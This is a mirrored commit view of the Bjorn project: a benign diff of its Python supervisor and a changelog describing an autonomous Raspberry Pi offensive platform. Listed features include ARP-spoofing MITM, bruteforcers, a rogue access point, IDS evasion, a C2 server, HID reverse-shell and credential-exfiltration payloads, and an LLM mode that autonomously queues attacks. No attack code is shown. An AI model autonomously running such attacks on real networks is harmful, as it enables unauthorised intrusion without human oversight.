mirror of
https://github.com/infinition/Bjorn.git
synced 2026-05-02 09:21:24 +00:00
Compare commits
5 Commits
aac77a3e76
...
ai
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
b541ec1f61 | ||
|
|
b0584a1a8e | ||
|
|
3fa4d5742a | ||
|
|
df83cd2e92 | ||
|
|
b759ab6d4b |
53
Bjorn.py
53
Bjorn.py
@@ -1,7 +1,4 @@
|
||||
# Bjorn.py
|
||||
# Main entry point and supervisor for the Bjorn project
|
||||
# Manages lifecycle of threads, health monitoring, and crash protection.
|
||||
# OPTIMIZED FOR PI ZERO 2: Low CPU overhead, aggressive RAM management.
|
||||
"""Bjorn.py - Main supervisor: thread lifecycle, health monitoring, and crash protection."""
|
||||
|
||||
import logging
|
||||
import os
|
||||
@@ -305,7 +302,7 @@ class Bjorn:
|
||||
# Keep MANUAL sticky so supervisor does not auto-restart orchestration,
|
||||
# but only if the current mode isn't already handling it.
|
||||
# - MANUAL/BIFROST: already non-AUTO, no need to change
|
||||
# - AUTO: let it be — orchestrator will restart naturally (e.g. after Bifrost auto-disable)
|
||||
# - AUTO: let it be - orchestrator will restart naturally (e.g. after Bifrost auto-disable)
|
||||
try:
|
||||
current = self.shared_data.operation_mode
|
||||
if current == "AI":
|
||||
@@ -471,6 +468,14 @@ def handle_exit(
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 2e. Stop Plugin Manager
|
||||
try:
|
||||
mgr = getattr(shared_data, 'plugin_manager', None)
|
||||
if mgr and hasattr(mgr, 'stop_all'):
|
||||
mgr.stop_all()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 3. Stop Web Server
|
||||
try:
|
||||
if web_thread_obj and hasattr(web_thread_obj, "shutdown"):
|
||||
@@ -547,7 +552,7 @@ if __name__ == "__main__":
|
||||
health_thread = HealthMonitor(shared_data, interval_s=health_interval)
|
||||
health_thread.start()
|
||||
|
||||
# Sentinel watchdog — start if enabled in config
|
||||
# Sentinel watchdog - start if enabled in config
|
||||
try:
|
||||
from sentinel import SentinelEngine
|
||||
sentinel_engine = SentinelEngine(shared_data)
|
||||
@@ -560,7 +565,7 @@ if __name__ == "__main__":
|
||||
except Exception as e:
|
||||
logger.warning("Sentinel init skipped: %s", e)
|
||||
|
||||
# Bifrost engine — start if enabled in config
|
||||
# Bifrost engine - start if enabled in config
|
||||
try:
|
||||
from bifrost import BifrostEngine
|
||||
bifrost_engine = BifrostEngine(shared_data)
|
||||
@@ -573,7 +578,7 @@ if __name__ == "__main__":
|
||||
except Exception as e:
|
||||
logger.warning("Bifrost init skipped: %s", e)
|
||||
|
||||
# Loki engine — start if enabled in config
|
||||
# Loki engine - start if enabled in config
|
||||
try:
|
||||
from loki import LokiEngine
|
||||
loki_engine = LokiEngine(shared_data)
|
||||
@@ -586,6 +591,36 @@ if __name__ == "__main__":
|
||||
except Exception as e:
|
||||
logger.warning("Loki init skipped: %s", e)
|
||||
|
||||
# LLM Bridge - warm up singleton (starts LaRuche mDNS discovery if enabled)
|
||||
try:
|
||||
from llm_bridge import LLMBridge
|
||||
LLMBridge() # Initialise singleton, kicks off background discovery
|
||||
logger.info("LLM Bridge initialised")
|
||||
except Exception as e:
|
||||
logger.warning("LLM Bridge init skipped: %s", e)
|
||||
|
||||
# MCP Server - start if enabled in config
|
||||
try:
|
||||
import mcp_server
|
||||
if shared_data.config.get("mcp_enabled", False):
|
||||
mcp_server.start()
|
||||
logger.info("MCP server started")
|
||||
else:
|
||||
logger.info("MCP server loaded (disabled - enable via Settings)")
|
||||
except Exception as e:
|
||||
logger.warning("MCP server init skipped: %s", e)
|
||||
|
||||
# Plugin Manager - discover and load enabled plugins
|
||||
try:
|
||||
from plugin_manager import PluginManager
|
||||
plugin_manager = PluginManager(shared_data)
|
||||
shared_data.plugin_manager = plugin_manager
|
||||
plugin_manager.load_all()
|
||||
plugin_manager.install_db_hooks()
|
||||
logger.info(f"Plugin manager started ({len(plugin_manager._instances)} plugins loaded)")
|
||||
except Exception as e:
|
||||
logger.warning("Plugin manager init skipped: %s", e)
|
||||
|
||||
# Signal Handlers
|
||||
exit_handler = lambda s, f: handle_exit(
|
||||
s,
|
||||
@@ -689,6 +724,6 @@ if __name__ == "__main__":
|
||||
runtime_state_thread,
|
||||
False,
|
||||
)
|
||||
except:
|
||||
except Exception:
|
||||
pass
|
||||
sys.exit(1)
|
||||
|
||||
490
CHANGELOG.md
Normal file
490
CHANGELOG.md
Normal file
@@ -0,0 +1,490 @@
|
||||
# BJORN — Changelog
|
||||
|
||||
> **From Viking Raider to Cyber Warlord.**
|
||||
> This release represents a complete transformation of Bjorn — from a \~8,200-line Python prototype into a **\~58,000-line Python + \~42,000-line frontend** autonomous cybersecurity platform with AI orchestration, WiFi recon, HID attacks, network watchdog, C2 infrastructure, and a full Single-Page Application dashboard.
|
||||
|
||||
---
|
||||
|
||||
## [2.1.0] — 2026-03-19
|
||||
|
||||
### Codebase Cleanup
|
||||
- All Python file headers standardized to `"""filename.py - Description."""` format (~120 files)
|
||||
- All French comments, docstrings, log/print strings, and error messages translated to English
|
||||
- Removed redundant/obvious comments, verbose 10-20 line header essays trimmed to 1-3 lines
|
||||
- Fixed encoding artifacts (garbled UTF-8 box-drawing chars in CSS)
|
||||
- Fixed `# webutils/` path typos in 3 web_utils files
|
||||
- Replaced LLM-style em dashes with plain hyphens across all .py files
|
||||
|
||||
### Custom Scripts System
|
||||
- **Custom scripts directory** (`actions/custom/`) for user-uploaded scripts, ignored by orchestrator
|
||||
- **Two script formats supported**: Bjorn-format (class + `execute()` + `shared_data`) and free Python scripts (plain `argparse`)
|
||||
- **Auto-detection** via AST parsing: scripts with `b_class` var use action_runner, others run as raw subprocess
|
||||
- **`b_args` support** for both formats: drives web UI controls (text, number, select, checkbox, slider)
|
||||
- **Upload/delete** via web UI with metadata extraction (no code exec during upload)
|
||||
- **Auto-registration**: scripts dropped in `actions/custom/` via SSH are detected on next API call
|
||||
- Two example templates: `example_bjorn_action.py` and `example_free_script.py`
|
||||
- Custom scripts appear in console-sse manual mode dropdown under `<optgroup>`
|
||||
|
||||
### Action Runner
|
||||
- **`action_runner.py`** - Generic subprocess wrapper that bootstraps `shared_data` for manual action execution
|
||||
- Supports `--ip`, `--port`, `--mac` + arbitrary `--key value` args injected as `shared_data` attributes
|
||||
- SIGTERM handler for graceful stop from the web UI
|
||||
- MAC auto-resolution from DB if not provided
|
||||
- Handles both `execute()` and `scan()` (global actions like NetworkScanner)
|
||||
|
||||
### Script Scheduler & Conditional Triggers
|
||||
- **`script_scheduler.py`** - Lightweight 30s-tick background daemon for automated script execution
|
||||
- **Recurring schedules**: run every N seconds (min 30s), persistent across reboots
|
||||
- **One-shot schedules**: fire at a specific datetime, auto-disable after
|
||||
- **Conditional triggers**: fire scripts when DB conditions are met (AND/OR block logic)
|
||||
- **8 condition types**: `action_result`, `hosts_with_port`, `hosts_alive`, `cred_found`, `has_vuln`, `db_count`, `time_after`, `time_before`
|
||||
- **Orchestrator hook**: triggers evaluated immediately when actions complete (not just on 30s tick)
|
||||
- **Concurrency limited** to 4 simultaneous scheduled scripts (Pi Zero friendly)
|
||||
- **Condition builder** (`web/js/core/condition-builder.js`) - Visual nested AND/OR block editor
|
||||
- Scheduler page extended with 3 tabs: Queue (existing kanban), Schedules, Triggers
|
||||
- Full CRUD UI for schedules and triggers with inline edit, toggle, delete, auto-refresh
|
||||
- "Test" button for dry-run condition evaluation
|
||||
|
||||
### Package Manager
|
||||
- **pip package management** for custom script dependencies
|
||||
- **SSE streaming** install progress (`pip install --break-system-packages`)
|
||||
- Packages tracked in DB (`custom_packages` table) - only recorded after successful install
|
||||
- Uninstall with DB cleanup
|
||||
- Package name validation (regex whitelist, no shell injection)
|
||||
- New "Packages" tab in Actions page sidebar
|
||||
|
||||
### New Database Modules
|
||||
- `db_utils/schedules.py` - Schedule and trigger persistence (CRUD, due queries, cooldown checks)
|
||||
- `db_utils/packages.py` - Custom package tracking
|
||||
|
||||
### New Web Endpoints
|
||||
- `/api/schedules/*` (list, create, update, delete, toggle) - 5 endpoints
|
||||
- `/api/triggers/*` (list, create, update, delete, toggle, test) - 6 endpoints
|
||||
- `/api/packages/*` (list, install SSE, uninstall) - 3 endpoints
|
||||
- `/upload_custom_script`, `/delete_custom_script` - Custom script management
|
||||
|
||||
### Resource & Memory Fixes
|
||||
- Script output buffer capped at 2000 lines (was unbounded)
|
||||
- Finished scripts dict auto-pruned (max 20 historical entries)
|
||||
- AST parse results cached by file mtime (no re-parsing on every API call)
|
||||
- Module imports replaced with AST extraction in `list_scripts()` (no more `sys.modules` pollution)
|
||||
- Custom scripts filesystem scan throttled to once per 30s
|
||||
- Scheduler daemon: event queue capped at 100, subprocess cleanup with `wait()` + `stdout.close()`
|
||||
- Package install: graceful terminate -> wait -> kill cascade with FD cleanup
|
||||
|
||||
### Multilingual Comments Import
|
||||
- `comment.py` `_ensure_comments_loaded()` now imports all `comments.*.json` files on every startup
|
||||
- Drop `comments.fr.json`, `comments.de.json`, etc. next to `comments.en.json` for automatic multi-language support
|
||||
- Existing comments untouched via `INSERT OR IGNORE` (unique index dedup)
|
||||
|
||||
---
|
||||
|
||||
## [2.0.0] — 2025/2026 Major Release
|
||||
|
||||
### TL;DR — What's New
|
||||
|
||||
| Area | v1 (alpha 2) | v2 (this release) |
|
||||
|------|-------------|-------------------|
|
||||
| Python codebase | ~8,200 lines | **~58,000 lines** (7x) |
|
||||
| Web frontend | ~2,100 lines (6 static HTML pages) | **~42,000 lines** (25-page SPA) |
|
||||
| Action modules | 17 | **32** |
|
||||
| Database | Monolithic SQLite helper | **Modular facade** (18 specialized modules) |
|
||||
| AI/ML | Basic heuristic scoring | **Full RL engine** + LLM orchestrator + MCP server |
|
||||
| Web UI | Static multi-page HTML | **Hash-routed SPA** with lazy-loading, theming, i18n |
|
||||
| Languages | English only | **7 languages** (EN, FR, ES, DE, IT, RU, ZH) |
|
||||
| WiFi recon | None | **Bifrost engine** (Pwnagotchi-compatible) |
|
||||
| HID attacks | None | **Loki module** (USB Rubber Ducky-style) |
|
||||
| Network watchdog | None | **Sentinel engine** (9 detection modules) |
|
||||
| C2 server | None | **ZombieLand** (encrypted C2 with agent management) |
|
||||
| LLM integration | None | **LLM Bridge** + MCP Server + Autonomous Orchestrator |
|
||||
| Display | Basic 2.13" e-paper | **Multi-size EPD** + web-based layout editor |
|
||||
|
||||
---
|
||||
|
||||
### New Major Features
|
||||
|
||||
#### AI & LLM Integration — Bjorn Gets a Brain
|
||||
|
||||
- **LLM Bridge** (`llm_bridge.py`) — Singleton, thread-safe LLM backend with automatic cascade:
|
||||
1. LaRuche swarm node (LAND protocol / mDNS auto-discovery)
|
||||
2. Local Ollama instance
|
||||
3. External API (Anthropic / OpenAI / OpenRouter)
|
||||
4. Graceful fallback to templates
|
||||
- **Agentic tool-calling loop** — Up to 6-turn tool-use cycles with Anthropic API, enabling the LLM to query live network data and queue actions autonomously
|
||||
- **MCP Server** (`mcp_server.py`) — Model Context Protocol server exposing 7 Bjorn tools (`get_hosts`, `get_vulnerabilities`, `get_credentials`, `get_action_history`, `get_status`, `run_action`, `query_db`), compatible with Claude Desktop and any MCP client
|
||||
- **LLM Orchestrator** (`llm_orchestrator.py`) — Three operating modes:
|
||||
- `none` — LLM disabled (default, zero overhead)
|
||||
- `advisor` — LLM suggests one action per cycle (priority 85)
|
||||
- `autonomous` — Own daemon thread, full tool-calling loop, LLM becomes sole master of the action queue
|
||||
- **Smart fingerprint skip** — Autonomous mode only calls the LLM when network state actually changes (new hosts, vulns, or credentials), saving API tokens
|
||||
- **LAND Protocol** (`land_protocol.py`) — Native Python client for Local AI Network Discovery, auto-detects LaRuche inference nodes on LAN via mDNS
|
||||
- **LLM-powered EPD comments** — E-paper display comments optionally generated by LLM with Norse personality, seamless fallback to database templates
|
||||
- **Web chat interface** — Terminal-style chat with the LLM, tool-calling support, orchestrator reasoning log viewer
|
||||
- **LLM configuration page** — Full web UI for all LLM/MCP settings, connection testing, per-tool access control
|
||||
- **45+ new configuration parameters** for LLM bridge, MCP server, and orchestrator
|
||||
|
||||
#### Bifrost — WiFi Reconnaissance Engine
|
||||
|
||||
- **Pwnagotchi-compatible** WiFi recon daemon running alongside all Bjorn modes
|
||||
- **BettercapClient** — Full HTTP API client for bettercap (session control, WiFi module management, handshake capture)
|
||||
- **BifrostAgent** — Drives channel hopping, AP tracking, client deauth, handshake collection
|
||||
- **BifrostAutomata** — State machine (MANUAL, AUTOMATIC, BORED, SAD, EXCITED, LONELY) controlling recon aggressiveness
|
||||
- **BifrostEpoch** — Tracks WiFi recon epochs with reward calculation
|
||||
- **BifrostVoice** — Personality/mood system for EPD display messages
|
||||
- **Plugin system** — Extensible event-driven plugin architecture
|
||||
- **Dedicated web page** (`bifrost.js`) for real-time WiFi recon monitoring
|
||||
- **Database module** (`db_utils/bifrost.py`) for persistent handshake and AP storage
|
||||
- **Monitor mode management** — Automatic WiFi interface setup/teardown scripts
|
||||
|
||||
#### Loki — USB HID Attack Framework
|
||||
|
||||
- **USB Rubber Ducky-style HID injection** via Raspberry Pi USB gadget mode
|
||||
- **HID Controller** (`loki/hid_controller.py`) — Low-level USB HID keyboard/mouse report writer to `/dev/hidg0`/`/dev/hidg1`
|
||||
- **HIDScript engine** (`loki/hidscript.py`) — JavaScript-based payload scripting language
|
||||
- **Multi-language keyboard layouts** — US, FR, DE, ES, IT, RU, UK, ZH with JSON layout definitions and auto-generation tool
|
||||
- **Pre-built payloads** — Hello World, Reverse Shell (Linux), Rickroll, WiFi credential exfiltration (Windows)
|
||||
- **Job queue** (`loki/jobs.py`) — Managed execution of HID payloads with status tracking
|
||||
- **Loki Deceiver action** (`actions/loki_deceiver.py`) — Rogue access point creation for WiFi authentication capture and MITM
|
||||
- **Dedicated web page** (`loki.js`) for payload management and execution
|
||||
- **Database module** (`db_utils/loki.py`) for job persistence
|
||||
|
||||
#### Sentinel — Network Watchdog Engine
|
||||
|
||||
- **9 detection modules** running as a lightweight background daemon:
|
||||
- `new_device` — Never-seen MAC appears on the network
|
||||
- `device_join` — Known device comes back online
|
||||
- `device_leave` — Known device goes offline
|
||||
- `arp_spoof` — Same IP claimed by multiple MACs (ARP cache conflict)
|
||||
- `port_change` — Host ports changed since last snapshot
|
||||
- `service_change` — New service detected on known host
|
||||
- `rogue_dhcp` — Multiple DHCP servers detected
|
||||
- `dns_anomaly` — DNS response pointing to unexpected IP
|
||||
- `mac_flood` — Sudden burst of new MACs (possible MAC flooding attack)
|
||||
- **Zero extra network traffic** — All checks read from existing Bjorn DB
|
||||
- **Configurable severity levels** (info, warning, critical)
|
||||
- **Dedicated web page** (`sentinel.js`) for alert browsing and rule management
|
||||
- **Database module** (`db_utils/sentinel.py`) for alert persistence
|
||||
|
||||
#### ZombieLand — Command & Control Infrastructure
|
||||
|
||||
- **C2 Manager** (`c2_manager.py`) — Professional C2 server with:
|
||||
- Encrypted agent communication (Fernet)
|
||||
- SSH-based agent registration via Paramiko
|
||||
- Agent heartbeat monitoring and health tracking
|
||||
- Job dispatch and result collection
|
||||
- UUID-based agent identification
|
||||
- **Dedicated web page** (`zombieland.js`) with SSE-powered real-time agent monitoring
|
||||
- **Database module** (`db_utils/agents.py`) for agent and job persistence
|
||||
- **Marked as experimental** with appropriate UI warnings
|
||||
|
||||
---
|
||||
|
||||
### New Action Modules (15 New Actions)
|
||||
|
||||
| Action | Module | Description |
|
||||
|--------|--------|-------------|
|
||||
| **ARP Spoofer** | `arp_spoofer.py` | Bidirectional ARP cache poisoning for MITM positioning with automatic gateway detection and clean ARP table restoration |
|
||||
| **Berserker Force** | `berserker_force.py` | Service resilience stress-testing — baseline measurement, controlled TCP/SYN/HTTP load testing, performance degradation quantification |
|
||||
| **DNS Pillager** | `dns_pillager.py` | Comprehensive DNS reconnaissance — reverse DNS, record enumeration (A/AAAA/MX/NS/TXT/CNAME/SOA/SRV/PTR), zone transfer attempts |
|
||||
| **Freya Harvest** | `freya_harvest.py` | Network-wide data harvesting and consolidation action |
|
||||
| **Heimdall Guard** | `heimdall_guard.py` | Advanced stealth module for traffic manipulation and IDS/IPS evasion |
|
||||
| **Loki Deceiver** | `loki_deceiver.py` | Rogue access point creation for WiFi authentication capture and MITM attacks |
|
||||
| **Odin Eye** | `odin_eye.py` | Passive network analyzer for credential and data pattern hunting |
|
||||
| **Rune Cracker** | `rune_cracker.py` | Advanced hash/credential cracking module |
|
||||
| **Thor Hammer** | `thor_hammer.py` | Lightweight service fingerprinting via TCP connect + banner grab (Pi Zero friendly, no nmap dependency) |
|
||||
| **Valkyrie Scout** | `valkyrie_scout.py` | Web surface reconnaissance — probes common paths, extracts auth types, login forms, missing security headers, error/debug strings |
|
||||
| **Yggdrasil Mapper** | `yggdrasil_mapper.py` | Network topology mapper via traceroute with service enrichment from DB and merged JSON topology graph |
|
||||
| **Web Enumeration** | `web_enum.py` | Web service enumeration and directory discovery |
|
||||
| **Web Login Profiler** | `web_login_profiler.py` | Web login form detection and profiling |
|
||||
| **Web Surface Mapper** | `web_surface_mapper.py` | Web application surface mapping and endpoint discovery |
|
||||
| **WPAsec Potfiles** | `wpasec_potfiles.py` | WPA-sec.stanev.org potfile integration for WiFi password recovery |
|
||||
| **Presence Join** | `presence_join.py` | Event-triggered action when a host joins the network (priority 90) |
|
||||
| **Presence Leave** | `presence_left.py` | Event-triggered action when a host leaves the network (priority 90) |
|
||||
| **Demo Action** | `demo_action.py` | Template/demonstration action for community developers |
|
||||
|
||||
### Improved Action Modules
|
||||
|
||||
- All bruteforce actions (SSH, FTP, SMB, SQL, Telnet) **rewritten** with shared `bruteforce_common.py` module providing:
|
||||
- `ProgressTracker` class for unified EPD progress reporting
|
||||
- Standardized credential iteration and result handling
|
||||
- Configurable rate limiting and timeout management
|
||||
- **Scanning action** (`scanning.py`) improved with better network discovery and host tracking
|
||||
- **Nmap Vulnerability Scanner** refined with better CVE parsing and result persistence
|
||||
- All steal/exfiltrate modules updated for new database schema compatibility
|
||||
|
||||
### Removed Actions
|
||||
|
||||
| Action | Reason |
|
||||
|--------|--------|
|
||||
| `rdp_connector.py` / `steal_files_rdp.py` | Replaced by more capable modules |
|
||||
| `log_standalone.py` / `log_standalone2.py` | Consolidated into proper logging system |
|
||||
| `ftp_connector.py`, `smb_connector.py`, etc. | Connector pattern replaced by dedicated bruteforce modules |
|
||||
|
||||
---
|
||||
|
||||
### Web Interface — Complete Rewrite
|
||||
|
||||
#### Architecture Revolution
|
||||
|
||||
- **Static multi-page HTML** (6 pages) replaced by a **hash-routed Single Page Application** with 25 lazy-loaded page modules
|
||||
- **SPA Router** (`web/js/core/router.js`) — Hash-based routing with guaranteed `unmount()` cleanup before page transitions
|
||||
- **ResourceTracker** (`web/js/core/resource-tracker.js`) — Automatic tracking and cleanup of intervals, timeouts, event listeners, and AbortControllers per page — **zero memory leaks**
|
||||
- **Single `index.html`** entry point replaces 6 separate HTML files
|
||||
- **Modular CSS** — Global stylesheet + per-page CSS files (`web/css/pages/*.css`)
|
||||
|
||||
#### New Web Pages (19 New Pages)
|
||||
|
||||
| Page | Module | Description |
|
||||
|------|--------|-------------|
|
||||
| **Dashboard** | `dashboard.js` | Real-time system stats, resource monitoring, uptime tracking |
|
||||
| **Actions** | `actions.js` | Action browser with enable/disable toggles and configuration |
|
||||
| **Actions Studio** | `actions-studio.js` | Visual action pipeline editor with drag-and-drop canvas |
|
||||
| **Attacks** | `attacks.js` | Attack configuration with image upload and EPD layout editor tab |
|
||||
| **Backup** | `backup.js` | Database backup/restore management |
|
||||
| **Bifrost** | `bifrost.js` | WiFi recon monitoring dashboard |
|
||||
| **Database** | `database.js` | Direct database browser and query tool |
|
||||
| **Files** | `files.js` | File manager with upload, drag-drop, rename, delete |
|
||||
| **LLM Chat** | `llm-chat.js` | Terminal-style LLM chat with tool-calling and orch log viewer |
|
||||
| **LLM Config** | `llm-config.js` | Full LLM/MCP configuration panel |
|
||||
| **Loki** | `loki.js` | HID attack payload management and execution |
|
||||
| **RL Dashboard** | `rl-dashboard.js` | Reinforcement Learning metrics and model performance visualization |
|
||||
| **Scheduler** | `scheduler.js` | Action scheduler configuration and monitoring |
|
||||
| **Sentinel** | `sentinel.js` | Network watchdog alerts and rule management |
|
||||
| **Vulnerabilities** | `vulnerabilities.js` | CVE browser with modal details and feed sync |
|
||||
| **Web Enum** | `web-enum.js` | Web enumeration results browser with status filters |
|
||||
| **ZombieLand** | `zombieland.js` | C2 agent management dashboard (experimental) |
|
||||
| **Bjorn Debug** | `bjorn-debug.js` | System debug information and diagnostics |
|
||||
| **Scripts** | (via scheduler) | Custom script upload and execution |
|
||||
|
||||
#### Improved Existing Pages
|
||||
|
||||
- **Network** (`network.js`) — D3 force-directed graph completely rewritten with proper cleanup on unmount, lazy D3 loading, search debounce, simulation stop
|
||||
- **Credentials** (`credentials.js`) — AbortController tracking, toast timer cleanup, proper state reset
|
||||
- **Loot** (`loot.js`) — Search timer cleanup, ResourceTracker integration
|
||||
- **NetKB** (`netkb.js`) — View mode persistence, filter tracking, pagination integration
|
||||
- **Bjorn/EPD** (`bjorn.js`) — Image refresh tracking, zoom controls, null EPD state handling
|
||||
|
||||
#### Internationalization (i18n)
|
||||
|
||||
- **7 supported languages**: English, French, Spanish, German, Italian, Russian, Chinese
|
||||
- **i18n module** (`web/js/core/i18n.js`) with JSON translation files, `t()` helper function, and `data-i18n` attribute auto-translation
|
||||
- **Fallback chain**: Current language -> English -> developer warning
|
||||
- **Language selector** in UI with `localStorage` persistence
|
||||
|
||||
#### Theming Engine
|
||||
|
||||
- **Theme module** (`web/js/core/theme.js`) — CSS variable-based theming system
|
||||
- **Preset themes** including default "Nordic Acid" (dark green/cyan)
|
||||
- **User custom themes** with color picker + raw CSS editing
|
||||
- **Icon pack switching** via icon registry
|
||||
- **Theme import/export** as JSON
|
||||
- **Live preview** — changes applied instantly without page reload
|
||||
- **`localStorage` persistence** across sessions
|
||||
|
||||
#### Other Frontend Features
|
||||
|
||||
- **Console SSE** (`web/js/core/console-sse.js`) — Server-Sent Events for real-time log streaming with reconnect logic
|
||||
- **Quick Panel** (`web/js/core/quickpanel.js`) — Fast-access control panel
|
||||
- **Sidebar Layout** (`web/js/core/sidebar-layout.js`) — Collapsible sidebar navigation
|
||||
- **Settings Config** (`web/js/core/settings-config.js`) — Dynamic form generation from config schema with chip editor
|
||||
- **EPD Layout Editor** (`web/js/core/epd-editor.js`) — SVG drag-and-drop editor for e-paper display layouts with grid/snap, zoom (50-600%), undo stack, element properties panel
|
||||
- **D3.js v7** bundled for network topology visualization
|
||||
- **PWA Manifest** updated for installable web app experience
|
||||
|
||||
---
|
||||
|
||||
### Core Engine Improvements
|
||||
|
||||
#### Database — Modular Facade Architecture
|
||||
|
||||
- **Complete database rewrite** — Monolithic SQLite helper replaced by `BjornDatabase` facade delegating to **18 specialized modules** in `db_utils/`:
|
||||
- `base.py` — Connection management, thread-safe connection pool
|
||||
- `config.py` — Configuration CRUD operations
|
||||
- `hosts.py` — Host discovery and tracking
|
||||
- `actions.py` — Action metadata and history
|
||||
- `queue.py` — Action queue with priority system and circuit breaker
|
||||
- `vulnerabilities.py` — CVE vulnerability storage
|
||||
- `software.py` — Software inventory
|
||||
- `credentials.py` — Credential storage
|
||||
- `services.py` — Service/port tracking
|
||||
- `scripts.py` — Custom script management
|
||||
- `stats.py` — Statistics and metrics
|
||||
- `backups.py` — Database backup/restore
|
||||
- `comments.py` — EPD comment templates
|
||||
- `agents.py` — C2 agent management
|
||||
- `studio.py` — Actions Studio pipeline data
|
||||
- `webenum.py` — Web enumeration results
|
||||
- `sentinel.py` — Sentinel alert storage
|
||||
- `bifrost.py` — WiFi recon data
|
||||
- `loki.py` — HID attack job storage
|
||||
- **Full backward compatibility** maintained via `__getattr__` delegation
|
||||
|
||||
#### Orchestrator — Smarter, More Resilient
|
||||
|
||||
- **Action Scheduler** (`action_scheduler.py`) — Complete rewrite with:
|
||||
- Trigger evaluation system (`on_host_alive`, `on_port_change`, `on_web_service`, `on_join`, `on_leave`, `on_start`, `on_success:*`)
|
||||
- Requirements checking with dependency resolution
|
||||
- Cooldown and rate limiting per action
|
||||
- Priority queue processing
|
||||
- Circuit breaker integration
|
||||
- LLM autonomous mode skip option
|
||||
- **Per-action circuit breaker** — 3-state machine (closed -> open -> half-open) with exponential backoff, prevents repeated failures from wasting resources
|
||||
- **Global concurrency limiter** — DB-backed running action count check, configurable `semaphore_slots`
|
||||
- **Manual mode with active scanning** — Background scan timer keeps network discovery running even in manual mode
|
||||
- **Runtime State Updater** (`runtime_state_updater.py`) — Dedicated background thread keeping display-facing data fresh, decoupled from render loop
|
||||
|
||||
#### AI/ML Engine — From Heuristic to Reinforcement Learning
|
||||
|
||||
- **AI Engine** (`ai_engine.py`) — Full reinforcement learning decision engine:
|
||||
- Feature-based action scoring
|
||||
- Model versioning with up to 3 versions on disk
|
||||
- Auto-rollback if average reward drops after 50 decisions
|
||||
- Cold-start bootstrap with persistent per-(action, port_profile) running averages
|
||||
- Blended heuristic/bootstrap scoring during warm-up phase
|
||||
- **Feature Logger** (`feature_logger.py`) — Structured feature logging for ML training with variance-based feature selection
|
||||
- **Data Consolidator** (`data_consolidator.py`) — Aggregates logged features into training-ready datasets exportable for TensorFlow/PyTorch
|
||||
- **Continuous reward shaping** — Novelty bonus, repeat penalty, diminishing returns, partial credit for long-running failed actions
|
||||
- **AI utility modules** (`ai_utils.py`) for shared ML helper functions
|
||||
|
||||
#### Display — Multi-Size EPD Support
|
||||
|
||||
- **Display Layout Engine** (`display_layout.py`) — JSON-based element positioning system:
|
||||
- Built-in layouts for 2.13" and 2.7" Waveshare e-paper displays
|
||||
- 20+ positionable UI elements (icons, text, bars, status indicators)
|
||||
- Custom layout override via `resources/layouts/{epd_type}.json`
|
||||
- `px()`/`py()` scaling preserved for resolution independence
|
||||
- **EPD Manager** (`epd_manager.py`) — Abstraction layer over Waveshare EPD hardware
|
||||
- **Web-based EPD Layout Editor** — SVG drag-and-drop canvas with:
|
||||
- Corner resize handles
|
||||
- Color/NB/BN display mode preview
|
||||
- Grid/snap, zoom (50-600%), toggleable element labels
|
||||
- Add/delete elements, import/export layout JSON
|
||||
- 50-deep undo stack (Ctrl+Z)
|
||||
- Color-coded elements by type
|
||||
- Arrow key nudge, keyboard shortcuts
|
||||
- **Display module** (`display.py`) grew from 390 to **1,130 lines** with multi-layout rendering pipeline
|
||||
|
||||
#### Web Server — Massive Expansion
|
||||
|
||||
- **webapp.py** grew from 222 to **1,037 lines**
|
||||
- **18 web utility modules** in `web_utils/` (was: 0):
|
||||
- `action_utils.py`, `attack_utils.py`, `backup_utils.py`, `bifrost_utils.py`
|
||||
- `bluetooth_utils.py`, `c2_utils.py`, `character_utils.py`, `comment_utils.py`
|
||||
- `db_utils.py`, `debug_utils.py`, `file_utils.py`, `image_utils.py`
|
||||
- `index_utils.py`, `llm_utils.py`, `loki_utils.py`, `netkb_utils.py`
|
||||
- `network_utils.py`, `orchestrator_utils.py`, `rl_utils.py`, `script_utils.py`
|
||||
- `sentinel_utils.py`, `studio_utils.py`, `system_utils.py`, `vuln_utils.py`
|
||||
- `webenum_utils.py`
|
||||
- **Paginated API endpoints** for heavy data (`?page=N&per_page=M`)
|
||||
- **RESTful API** covering all new features (LLM, MCP, Sentinel, Bifrost, Loki, C2, EPD editor, backups, etc.)
|
||||
|
||||
#### Configuration — Greatly Expanded
|
||||
|
||||
- **shared.py** grew from 685 to **1,502 lines** — more than doubled
|
||||
- **New configuration sections**:
|
||||
- LLM Bridge (14 parameters)
|
||||
- MCP Server (4 parameters)
|
||||
- LLM Orchestrator (7 parameters)
|
||||
- AI/ML Engine (feature selection, model versioning, cold-start bootstrap)
|
||||
- Circuit breaker (threshold, cooldown)
|
||||
- Manual mode scanning (interval, auto-scan toggle)
|
||||
- Sentinel watchdog settings
|
||||
- Bifrost WiFi recon settings
|
||||
- Loki HID attack settings
|
||||
- Runtime state updater timings
|
||||
- **Default config system** — `resources/default_config/` with bundled default action modules and comment templates
|
||||
|
||||
---
|
||||
|
||||
### Security Fixes
|
||||
|
||||
- **[SEC-01]** Eliminated all `shell=True` subprocess calls — replaced with safe argument lists
|
||||
- **[SEC-02]** Added MAC address validation (regex) in DELETE route handler to prevent path traversal
|
||||
- **[SEC-03]** Strengthened path validation using `os.path.realpath()` + dedicated validation helper to prevent symlink-based path traversal
|
||||
- **[SEC-04]** Cortex config secrets replaced with placeholder values, properly `.gitignore`d
|
||||
- **[SEC-05]** Added JWT authentication to Cortex WebSocket `/ws/logs` endpoint
|
||||
- **[SEC-06]** Cortex device API authentication now required by default, CORS configurable via environment variable
|
||||
- **MCP security** — Per-tool access control via `mcp_allowed_tools`, `query_db` restricted to SELECT only
|
||||
- **File operations** — All file upload/download/delete operations use canonicalized path validation
|
||||
|
||||
### Bug Fixes
|
||||
|
||||
- **[BT-01]** Replaced bare `except:` clauses with specific exception handling + logging in Bluetooth utils
|
||||
- **[BT-02]** Added null address validation in Bluetooth route entry points
|
||||
- **[BT-03]** Added `threading.Lock` for `bt.json` read/write (race condition fix)
|
||||
- **[BT-04]** Changed `auto_bt_connect` service restart to non-fatal (`check=False`)
|
||||
- **[WEB-01]** Fixed SSE reconnect counter — only resets after 5+ consecutive healthy messages (was: reset on every single message, enabling infinite reconnect loops)
|
||||
- **[WEB-02]** Removed empty string from `silent_routes` that was suppressing ALL log messages
|
||||
- **[STAB-03]** Cleaned up dead GPS UI references, wired rl-dashboard mount
|
||||
